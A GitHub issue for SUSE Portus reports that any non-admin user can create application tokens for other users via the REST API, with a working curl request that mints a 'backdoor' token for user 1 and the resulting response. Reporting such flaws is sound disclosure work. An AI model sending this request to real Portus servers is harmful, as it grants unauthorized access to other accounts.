Users can create application tokens for any user via the REST API

claudiocabral commented 3 years ago

Description

It seems to me that any user can add application tokens to other users via the REST API.

Steps to reproduce

Create a new user (can be a bot) without admin privileges, teams or namespaces

Do a post request to create a new token for an arbitrary user

curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}'  'https://portus.mydomain.com/api/v1/users/1/application_tokens'

Get an application token for user 1

{"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}

Expected behavior: Users cannot create tokens for other users
Actual behavior: Users can create tokens for other users

Portus version: opensuse/portus:2.4

stale[bot] commented 3 years ago

Thanks for all your contributions! This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

prionkor commented 3 years ago

This is a serious security issue any update on this?

s00500 commented 2 years ago

?

SUSE / Portus

Users can create application tokens for any user via the REST API #2319

Description

Steps to reproduce